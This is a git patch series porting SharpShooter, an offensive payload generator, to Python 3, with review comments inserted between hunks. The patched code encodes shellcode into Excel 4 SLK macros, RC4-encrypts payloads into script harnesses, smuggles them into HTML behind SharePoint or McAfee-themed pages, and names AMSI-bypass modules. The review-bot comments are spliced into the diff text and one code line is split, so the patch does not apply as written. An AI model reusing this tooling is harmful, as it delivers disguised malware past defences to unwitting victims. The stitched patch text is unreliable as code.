From bd4c22e8d2cebccb22dbf5ee88921164ea60c595 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Daniel=20Ruiz=20de=20Alegr=C3=ADa?=
Date: Wed, 20 Mar 2024 13:51:30 +0100
Subject: [PATCH 1/4] Fix indentation error
---
 modules/excel4.py | 46 +++++++++++++++++++++++-----------------------
 1 file changed, 23 insertions(+), 23 deletions(-)
diff --git a/modules/excel4.py b/modules/excel4.py
index 7982917..5f954fb 100644
--- a/modules/excel4.py
+++ b/modules/excel4.py
@@ -6,7 +6,7 @@
 # http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-18-the-ms-office-magic-show-stan-hegt-pieter-ceelen
 def bytes2int(str):
- return int(str.encode('hex'), 16)
+ return int(str.encode('hex'), 16)
 SHELLCODE_HEADER = """ID;P
 O;E
@@ -25,28 +25,28 @@ def bytes2int(str):
 """
 def generate_slk(shellcode_path):
- return build_shellcode_slk(shellcode_path)
+ return build_shellcode_slk(shellcode_path)
 def build_shellcode_slk(shellcode_path):
- #print("[*] Building shellcode exec SLK")
+ #print("[*] Building shellcode exec SLK")
- slk_output = SHELLCODE_HEADER
- with open(shellcode_path, "rb") as f:
- byte = f.read(1)
- i = 0
- cell=0
- while byte != "":
- if i == 0:
- cell=cell+1
- slk_output+=("C;X2;Y%s;K0;E" % (str(cell)))
- else:
- slk_output+=("&")
- slk_output+=("CHAR(" + str(bytes2int(byte)) + ")")
- byte = f.read(1)
- i+=1
- if i == 20:
- slk_output+=("\n")
- i = 0
- cell=cell+1
- slk_output+=("\nC;X2;Y%s;K0;ERETURN()\nE\n" % (str(cell)))
- return slk_output
\ No newline at end of file
+ slk_output = SHELLCODE_HEADER
+ with open(shellcode_path, "rb") as f:
+ byte = f.read(1)
+ i = 0
+ cell=0
+ while byte != "":
+ if i == 0:
+ cell=cell+1
+ slk_output+=("C;X2;Y%s;K0;E" % (str(cell)))
+ else:
+ slk_output+=("&")
+ slk_output+=("CHAR(" + str(bytes2int(byte)) + ")")
+ byte = f.read(1)
+ i+=1
+ if i == 20:
+ slk_output+=("\n")
+ i = 0
+ cell=cell+1
+ slk_output+=("\nC;X2;Y%s;K0;ERETURN()\nE\n" % (str(cell)))
+ return slk_output
From d29df60ecf1655c1d0f872f4c72bfa9d295009c4 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Daniel=20Ruiz=20de=20Alegr=C3=ADa?=
Date: Wed, 20 Mar 2024 13:52:20 +0100
Subject: [PATCH 2/4] Fixes for python3
---
 SharpShooter.py | 44 ++++++++++++++++++++++--------------------
 modules/embedinhtml.py | 20 +++++++++----------
 modules/excel4.py | 4 ++--
 3 files changed, 35 insertions(+), 33 deletions(-)
diff --git a/SharpShooter.py b/SharpShooter.py
index 9b10de1..1c13fe6 100644
--- a/SharpShooter.py
+++ b/SharpShooter.py
@@ -17,6 +17,7 @@
 import string
 import sys
 import argparse
+import traceback
 from jsmin import jsmin
 from modules import *
@@ -162,12 +163,12 @@ def validate_args(self):
 return args
 def read_file(self, f):
- with open(f, 'r') as fs:
+ with open(f, 'rb') as fs:
 content = fs.read()
 return content
 def rand_key(self, n):
- return ''.join([random.choice(string.lowercase) for i in xrange(n)])
+ return ''.join([random.choice(string.ascii_lowercase) for i in range(n)])
 def gzip_str(self, string_):
 fgz = BytesIO()
@@ -182,7 +183,7 @@ def gzip_str(self, string_):
 return fgz
 def rc4(self, key, data):
- S = range(256)
+ S = list(range(256))
 j = 0
 out = []
@@ -201,7 +202,7 @@ def rc4(self, key, data):
 def run(self, args):
- template_body = ""
+ template_body = b""
 template_base = "templates/sharpshooter."
 shellcode_delivery = False
 shellcode_gzip = ""
@@ -401,6 +402,7 @@ def run(self, args):
 except Exception as e:
 print("\n\033[1;31m[!]\033[0;0m Incorrect choice")
+ template_body = template_body.decode(encoding='utf-8')
 template_code = template_body.replace("%SANDBOX_ESCAPES%", sandbox_techniques)
 delivery_method = "1"
@@ -432,9 +434,9 @@ def run(self, args):
 sc = self.read_file(args.shellcode_file)
 shellcode.append(sc)
- shellcode = "\n".join(shellcode)
+ shellcode = b"\n".join(shellcode)
- shellcode_final = shellcode_template.replace("%SHELLCODE%", shellcode)
+ shellcode_final = shellcode_template.replace(b"%SHELLCODE%", shellcode)
 shellcode_gzip = self.gzip_str(shellcode_final)
 elif (args.stageless or stageless_payload is True):
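Review bot: `read_file` now returns bytes instead of str, but nothing in the `-162,12` hunk records that, and every caller in this series has to remember to call `.decode(encoding='utf-8')` on the result; a one-line docstring would make the contract explicit, e.g. `"""Return the raw bytes of file *f*; callers decode text themselves."""`. In the same hunk `rand_key` builds a throwaway list inside `join`; the generator form `''.join(random.choice(string.ascii_lowercase) for _ in range(n))` reads the same and avoids the extra allocation. Both methods belong to a class whose header is outside the hunk.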
@@ -444,7 +446,7 @@ def run(self, args):
 # sc_split = [encoded_sc[i:i+100] for i in range(0, len(encoded_sc), 100)]
 # for i in sc_split:
 #else:
- template_code = template_code.replace("%SHELLCODE64%", encoded_sc)
+ template_code = template_code.replace("%SHELLCODE64%", encoded_sc.decode(encoding='utf-8'))
 else:
 refs = args.refs
@@ -491,8 +493,8 @@ def run(self, args):
 template_code = template_code.replace("%DELIVERY%", deliverycode)
 break
- except Exception as e:
- print(e)
+ except Exception:
+ print(traceback.format_exc())
 print("\n\033[1;31m[!]\033[0;0m Incorrect choice")
 sys.exit(-1)
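Review bot: `print(traceback.format_exc())` in the new handler of the `-491,8` hunk sends the traceback to stdout, where it is interleaved with the tool's normal output; `traceback.print_exc()` writes the same text to stderr. The clause still catches every `Exception` and then reports each one as `Incorrect choice` before `sys.exit(-1)`, so a missing template file or a typo inside the try body is indistinguishable from a bad menu choice; narrowing it to the exception the choice parsing actually raises (not visible here), or dropping the `Incorrect choice` line when a traceback was printed, would keep the message truthful. The try block this handler belongs to starts outside the hunk.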
@@ -516,36 +518,36 @@ def run(self, args):
 key = self.rand_key(10)
 payload_encrypted = self.rc4(key, template_code)
- payload_encoded = base64.b64encode(payload_encrypted)
+ payload_encoded = base64.b64encode(payload_encrypted.encode(encoding='utf-8'))
 awl_payload_simple = ""
 if("js" in file_type or args.comtechnique):
- harness = self.read_file("templates/harness.js")
- payload = harness.replace("%B64PAYLOAD%", payload_encoded)
+ harness = self.read_file("templates/harness.js").decode(encoding='UTF-8')
+ payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8'))
 payload = payload.replace("%KEY%", "'%s'" % (key))
 payload_minified = jsmin(payload)
 awl_payload_simple = template_code
 elif("wsf" in file_type):
- harness = self.read_file("templates/harness.wsf")
- payload = harness.replace("%B64PAYLOAD%", payload_encoded)
+ harness = self.read_file("templates/harness.wsf").decode(encoding='utf-8')
+ payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8'))
 payload = payload.replace("%KEY%", "'%s'" % (key))
 payload_minified = jsmin(payload)
 elif("hta" in file_type):
- harness = self.read_file("templates/harness.hta")
- payload = harness.replace("%B64PAYLOAD%", payload_encoded)
+ harness = self.read_file("templates/harness.hta").decode(encoding='utf-8')
+ payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8'))
 payload = payload.replace("%KEY%", "'%s'" % (key))
 payload_minified = jsmin(payload)
 elif("vba" in file_type):
- harness = self.read_file("templates/harness.vba")
- payload = harness.replace("%B64PAYLOAD%", payload_encoded)
+ harness = self.read_file("templates/harness.vba").decode(encoding='utf-8')
+ payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8'))
 payload = payload.replace("%KEY%", "\"%s\"" % (key))
 payload_minified = jsmin(payload)
 elif("slk" in file_type):
 pass
 else:
- harness = self.read_file("templates/harness.vbs")
- payload =
harness.replace("%B64PAYLOAD%", payload_encoded)
+ harness = self.read_file("templates/harness.vbs").decode(encoding='utf-8')
+ payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8'))
 payload = payload.replace("%KEY%", "\"%s\"" % (key))
 if (payload_type == 3):
@@ -583,7 +585,7 @@ def run(self, args):
 outputfile_shellcode = outputfile + ".payload"
 with open("output/" + outputfile_shellcode, 'w') as f:
 gzip_encoded = base64.b64encode(shellcode_gzip.getvalue())
- f.write(gzip_encoded)
+ f.write(gzip_encoded.decode(encoding='utf-8'))
 f.close()
 print("\033[1;34m[*]\033[0;0m Written shellcode payload to output/%s" % outputfile_shellcode)
diff --git a/modules/embedinhtml.py b/modules/embedinhtml.py
index 3c7e794..eb817d7 100644
--- a/modules/embedinhtml.py
+++ b/modules/embedinhtml.py
@@ -63,7 +63,7 @@ def convertFromTemplate(parameters, templateFile):
 class RC4:
 def __init__(self, key=None):
- self.state = range(256) # initialisation de la table de permutation
+ self.state = list(range(256)) # initialisation de la table de permutation
 self.x = self.y = 0 # les index x et y, au lieu de i et j
 if key is not None:
@@ -72,7 +72,7 @@ def __init__(self, key=None):
 # Key schedule
 def init(self, key):
- for i in range(256):
+ for i in list(range(256)):
 self.x = (ord(key[i % len(key)]) + self.state[i] + self.x) & 0xFF
 self.state[i], self.state[self.x] = self.state[self.x], self.state[i]
 self.x = 0
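Review bot: In the `-516,36` hunk `payload_encoded` is decoded with `.decode(encoding='utf-8')` separately in each of the five harness branches, and each branch also repeats `self.read_file(...).decode(...)`; decoding once right after the encode, `payload_encoded = base64.b64encode(payload_encrypted.encode(encoding='utf-8')).decode('ascii')`, would let every branch keep its original one-line `harness.replace("%B64PAYLOAD%", payload_encoded)` form. base64 output is pure ASCII, so `'ascii'` states the intent more precisely than `'utf-8'`, and the js branch spells the encoding `'UTF-8'` while the others use `'utf-8'`, which is harmless but worth aligning. The enclosing `run` continues on both sides of the hunk.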
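Review bot: `for i in list(range(256))` in the `-72,7` hunk wraps the range in a list for no reason; a `range` object iterates directly in Python 3 and the `list()` only allocates a 256-element list on every call, so `for i in range(256):` is the Python 3 form. The same wrapping appears in the `-80,11` hunk (`for i in list(range(len(data))):`) and the `-93,8` hunk (`for i in list(range(256)):`); only the `self.state = list(range(256))` assignment in the `-63,7` hunk and the `S` table in `-93,8` genuinely need a list, because they are indexed and mutated afterwards. `init` belongs to a class whose header is outside the hunk.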
@@ -80,11 +80,11 @@ def init(self, key):
 # Encrypt binary input data
 def binaryEncrypt(self, data):
 output = [None] * len(data)
- for i in range(len(data)):
+ for i in list(range(len(data))):
 self.x = (self.x + 1) & 0xFF
 self.y = (self.state[self.x] + self.y) & 0xFF
 self.state[self.x], self.state[self.y] = self.state[self.y], self.state[self.x]
- output[i] = chr((data[i] ^ self.state[(self.state[self.x] + self.state[self.y]) & 0xFF]))
+ output[i] = chr((ord(data[i]) ^ self.state[(self.state[self.x] + self.state[self.y]) & 0xFF]))
 return ''.join(output)
 # Encrypt string input data
@@ -93,8 +93,8 @@ def stringEncrypt(self, data):
 Decrypt/encrypt the passed data using RC4 and the given key.
 https://github.com/EmpireProject/Empire/blob/73358262acc8ed3c34ffc87fa593655295b81434/data/agent/stagers/dropbox.py
 """
- S, j, out = range(256), 0, []
- for i in range(256):
+ S, j, out = list(range(256)), 0, []
+ for i in list(range(256)):
 j = (j + S[i] + ord(self.key[i % len(self.key)])) % 256
 S[i], S[j] = S[j], S[i]
 i = j = 0
@@ -114,7 +114,7 @@ def run_embedInHtml(key, fileName, outFileName, template_name):
 if key and fileName and outFileName:
 try:
- with open(fileName) as fileHandle:
+ with open(fileName, 'rb') as fileHandle:
 fileBytes = bytearray(fileHandle.read())
 fileHandle.close()
 print("\033[1;34m[*]\033[0;0m File [{}] successfully loaded !".format(fileName))
@@ -134,7 +134,7 @@ def run_embedInHtml(key, fileName, outFileName, template_name):
 print("\033[93m[!]\033[0;0m Could not determine the mime type for the input file. Force it using the -m switch.")
 quit()
- payload = base64.b64encode(rc4Encryptor.binaryEncrypt(fileBytes))
+ payload = base64.b64encode(rc4Encryptor.binaryEncrypt(fileBytes.decode(encoding='utf-8')).encode())
 print("\033[1;34m[*]\033[0;0m Encrypted input file with key [{}]".format(key))
 # blobShim borrowed from https://github.com/mholt/PapaParse/issues/175#issuecomment-75597039
@@ -153,8 +153,8 @@ def run_embedInHtml(key, fileName, outFileName, template_name):
 varBlobObjectName = rand()
 varBlob = rand()
 varBlobShim = rand()
- blobShimEncrypted = base64.b64encode(rc4Encryptor.stringEncrypt(blobShim))
- blobObjectNameEncrypted = base64.b64encode(rc4Encryptor.stringEncrypt("Blob"))
+ blobShimEncrypted = base64.b64encode(rc4Encryptor.stringEncrypt(blobShim).encode())
+ blobObjectNameEncrypted = base64.b64encode(rc4Encryptor.stringEncrypt("Blob").encode())
 fileName = os.path.basename(fileName)
 params = {
diff --git a/modules/excel4.py b/modules/excel4.py
index 5f954fb..daec246 100644
--- a/modules/excel4.py
+++ b/modules/excel4.py
@@ -5,8 +5,8 @@
 # For a breakdown of this technique I recommend watching
 # http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-18-the-ms-office-magic-show-stan-hegt-pieter-ceelen
-def bytes2int(str):
- return int(str.encode('hex'), 16)
+def bytes2int(byte):
+ return int.from_bytes(byte, byteorder='big')
 SHELLCODE_HEADER = """ID;P
 O;E
From dc8d0fce019e9621debb6a672fcdcfb288303dd4 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Daniel=20Ruiz=20de=20Alegr=C3=ADa?=
Date: Wed, 20 Mar 2024 13:52:47 +0100
Subject: [PATCH 3/4] Use relative paths
---
 SharpShooter.py | 31 +++++++++++++++++--------------
 modules/embedinhtml.py | 7 ++++---
 2 files changed, 21 insertions(+), 17 deletions(-)
diff --git a/SharpShooter.py b/SharpShooter.py
index 1c13fe6..0033f71 100644
--- a/SharpShooter.py
+++ b/SharpShooter.py
@@ -17,6 +17,7 @@
 import string
 import sys
 import argparse
+import os
 import traceback
 from jsmin import jsmin
 from modules import *
@@ -204,6 +205,7 @@ def run(self, args):
 template_body = b""
 template_base = "templates/sharpshooter."
+ source_path = os.path.dirname(os.path.realpath(__file__)) + "/"
 shellcode_delivery = False
 shellcode_gzip = ""
 payload_type = 0
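Review bot: `source_path = os.path.dirname(os.path.realpath(__file__)) + "/"` in the `-204,6` hunk builds paths by string concatenation with a hard-coded `/`, and every later use repeats the pattern: `source_path + "templates/shellcode.cs"` in the `-427,7` hunk, `source_path + template_base` in the `-261,6` hunk and the five `source_path + "templates/harness.*"` lines in the `-523,30` hunk. Keeping `source_path = os.path.dirname(os.path.realpath(__file__))` without the trailing separator and writing `os.path.join(source_path, "templates", "shellcode.cs")` at the use sites is portable and does not silently break if the trailing `/` is ever dropped. A short comment on the new line, e.g. `# templates are resolved relative to this file, not the cwd`, would also record why the commit switched away from cwd-relative paths. `run` continues outside the hunk.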
@@ -261,6 +263,7 @@ def run(self, args):
 template_base = "templates/sharpshooterv4."
 #print(template_base)
+ template_base = source_path + template_base
 if(args.payload == "hta"):
 payload_type = 1
@@ -427,7 +430,7 @@ def run(self, args):
 shellcode_payload = shellcode_payload.lower()
 if (shellcode_payload == "y" or shellcode_payload == "yes"):
 shellcode_delivery = True
- shellcode_template = self.read_file("templates/shellcode.cs")
+ shellcode_template = self.read_file(source_path + "templates/shellcode.cs")
 shellcode = []
@@ -523,30 +526,30 @@ def run(self, args):
 awl_payload_simple = ""
 if("js" in file_type or args.comtechnique):
- harness = self.read_file("templates/harness.js").decode(encoding='UTF-8')
+ harness = self.read_file(source_path + "templates/harness.js").decode(encoding='UTF-8')
 payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8'))
 payload = payload.replace("%KEY%", "'%s'" % (key))
 payload_minified = jsmin(payload)
 awl_payload_simple = template_code
 elif("wsf" in file_type):
- harness = self.read_file("templates/harness.wsf").decode(encoding='utf-8')
+ harness = self.read_file(source_path + "templates/harness.wsf").decode(encoding='utf-8')
 payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8'))
 payload = payload.replace("%KEY%", "'%s'" % (key))
 payload_minified = jsmin(payload)
 elif("hta" in file_type):
- harness = self.read_file("templates/harness.hta").decode(encoding='utf-8')
+ harness = self.read_file(source_path + "templates/harness.hta").decode(encoding='utf-8')
 payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8'))
 payload = payload.replace("%KEY%", "'%s'" % (key))
 payload_minified = jsmin(payload)
 elif("vba" in file_type):
- harness = self.read_file("templates/harness.vba").decode(encoding='utf-8')
+ harness = self.read_file(source_path + "templates/harness.vba").decode(encoding='utf-8')
 payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8'))
 payload = payload.replace("%KEY%", "\"%s\"" % (key))
 payload_minified = jsmin(payload)
 elif("slk" in file_type):
 pass
 else:
- harness = self.read_file("templates/harness.vbs").decode(encoding='utf-8')
+ harness = self.read_file(source_path + "templates/harness.vbs").decode(encoding='utf-8')
 payload = harness.replace("%B64PAYLOAD%", payload_encoded.decode(encoding='utf-8'))
 payload = payload.replace("%KEY%", "\"%s\"" % (key))
@@ -555,7 +558,7 @@ def run(self, args):
 elif (payload_type == 5):
 file_type = "vbe"
- f = open("output/" + outputfile_payload, 'w')
+ f = open(outputfile_payload, 'w')
 #print(payload)
 if(payload_type == 8):
 f.write(macro_stager)
@@ -565,9 +568,9 @@ def run(self, args):
 if(args.comtechnique):
 if not args.awltechnique or args.awltechnique == "wmic":
- payload_file = "output/" + outputfile + ".xsl"
+ payload_file = outputfile + ".xsl"
 else:
- payload_file = "output/" + outputfile + ".sct"
+ payload_file = outputfile + ".sct"
 #if("js" in file_type or "hta" in file_type or "wsf" in file_type):
 awl_payload = awl.create_com_stager(args.comtechnique, file_type, args.awlurl, payload_file, awl_payload_simple, args.amsi)
@@ -580,22 +583,22 @@ def run(self, args):
 f.write(payload)
 f.close()
- print("\033[1;34m[*]\033[0;0m Written delivery payload to output/%s" % outputfile_payload)
+ print("\033[1;34m[*]\033[0;0m Written delivery payload to %s" % outputfile_payload)
 if shellcode_delivery:
 outputfile_shellcode = outputfile + ".payload"
- with open("output/" + outputfile_shellcode, 'w') as f:
+ with open(outputfile_shellcode, 'w') as f:
 gzip_encoded = base64.b64encode(shellcode_gzip.getvalue())
 f.write(gzip_encoded.decode(encoding='utf-8'))
 f.close()
- print("\033[1;34m[*]\033[0;0m Written shellcode payload to output/%s" % outputfile_shellcode)
+ print("\033[1;34m[*]\033[0;0m Written shellcode payload to %s" % outputfile_shellcode)
 if "vba" not in file_type:
 if (args.smuggle):
 key = self.rand_key(10)
 template = ""
 template = args.template
- embedinhtml.run_embedInHtml(key, "./output/" + outputfile_payload, "./output/" + outputfile + ".html", template)
+ embedinhtml.run_embedInHtml(key, outputfile_payload, outputfile + ".html", template)
 if __name__ == "__main__":
 ss = SharpShooter()
 args = ss.validate_args()
- ss.run(args)
\ No newline at end of file
+ ss.run(args)
diff --git a/modules/embedinhtml.py b/modules/embedinhtml.py
index eb817d7..a96f0e4 100644
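Review bot: `f = open(outputfile_payload, 'w')` in the `-555,7` hunk and `with open(outputfile_shellcode, 'w') as f:` in the `-580,22` hunk open text files without an explicit encoding, so the bytes written depend on the locale of the machine running the tool even though the content was decoded as UTF-8 upstream; `open(outputfile_payload, 'w', encoding='utf-8')` (and the same for the shellcode file) makes the output deterministic across platforms. Dropping the `output/` prefix also moves every written file from the repository's `output/` directory to the current working directory; the printed messages were updated, but any README or help text that still refers to `output/` needs the same change (not visible here). The first `open(...)` is still not wrapped in `with`, so the handle is only closed by the later `f.close()` if no `f.write` raises; the block continues outside the hunk.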
--- a/modules/embedinhtml.py
+++ b/modules/embedinhtml.py
@@ -188,9 +188,9 @@ def run_embedInHtml(key, fileName, outFileName, template_name):
 if (template_choice < 1 or template_choice > 6):
 raise Exception
 if(template_choice == 1):
- templatesource = "./templates/sharepoint.tpl"
+ templatesource = "templates/sharepoint.tpl"
 elif(template_choice == 2):
- templatesource = "./templates/mcafee.tpl"
+ templatesource = "templates/mcafee.tpl"
 break
 except:
 print("\033[1;31m[!]\033[0;0m Incorrect choice")
@@ -198,8 +198,9 @@ def run_embedInHtml(key, fileName, outFileName, template_name):
 templatesource = input("\033[1;34m[*]\033[0;0m Provide full path to custom template\n")
 else:
- templatesource = "./templates/%s.tpl" % template_name
+ templatesource = "templates/%s.tpl" % template_name
+ templatesource = os.path.dirname(os.path.realpath(__file__)) + '/../' + templatesource
 resultHTML = convertFromTemplate(params, templatesource)
 if resultHTML is not None:
From 477f34c2bbe9facf687368eccdd4839dbc83da8f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Daniel=20Ruiz=20de=20Alegr=C3=ADa?=
Date: Wed, 20 Mar 2024 13:53:03 +0100
Subject: [PATCH 4/4] Use python3 shebang
---
 SharpShooter.py | 2 +-
 modules/amsikiller.py | 2 +-
 modules/awl.py | 2 +-
 modules/embedinhtml.py | 2 +-
 modules/excel4.py | 2 +-
 5 files changed, 5 insertions(+), 5 deletions(-)
diff --git a/SharpShooter.py b/SharpShooter.py
index 0033f71..a5daaf7 100644
--- a/SharpShooter.py
+++ b/SharpShooter.py
@@ -1,4 +1,4 @@
-#! /usr/bin/env python
+#!/usr/bin/env python3
 # -*- coding: utf-8 -*-
 #
diff --git a/modules/amsikiller.py b/modules/amsikiller.py
index 5f25b44..2b1124c 100644
--- a/modules/amsikiller.py
+++ b/modules/amsikiller.py
@@ -1,4 +1,4 @@
-#!/usr/bin/python
+#!/usr/bin/env python3
 def amsi_stub(file_type, technique, filename):
diff --git a/modules/awl.py b/modules/awl.py
index 9156758..6da4bb0 100644
--- a/modules/awl.py
+++ b/modules/awl.py
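Review bot: The added `templatesource = os.path.dirname(os.path.realpath(__file__)) + '/../' + templatesource` line in the `-198,8` hunk appears to sit after the `if`/`elif`/`else` chain rather than inside the `else:` (indentation is lost in this copy, but the `-188,9` hunk strips `./` from the built-in `sharepoint.tpl` and `mcafee.tpl` paths as well, which only makes sense if they pass through the same prefix); if so it is also applied to whatever the user typed at the `Provide full path to custom template` prompt, and an absolute custom path no longer resolves. Guarding it, `if not os.path.isabs(templatesource): templatesource = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', templatesource)`, keeps user-supplied paths intact and drops the hand-built `'/../'` separator. `run_embedInHtml` continues outside the hunk.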
@@ -1,4 +1,4 @@
-#!/usr/bin/python
+#!/usr/bin/env python3
 def create_com_stager(technique, filetype, awlurl, outputfile, sspayload, amsi):
diff --git a/modules/embedinhtml.py b/modules/embedinhtml.py
index a96f0e4..cb555ad 100644
--- a/modules/embedinhtml.py
+++ b/modules/embedinhtml.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
 # -*- coding: utf-8 -*-
 #
 # Original Author: Arno0x0x - https://twitter.com/Arno0x0x
diff --git a/modules/excel4.py b/modules/excel4.py
index daec246..5c99393 100644
--- a/modules/excel4.py
+++ b/modules/excel4.py
@@ -1,4 +1,4 @@
-#!/usr/bin/python
+#!/usr/bin/env python3
 import sys
 # Some of this code is bastardised from code by @StanHacked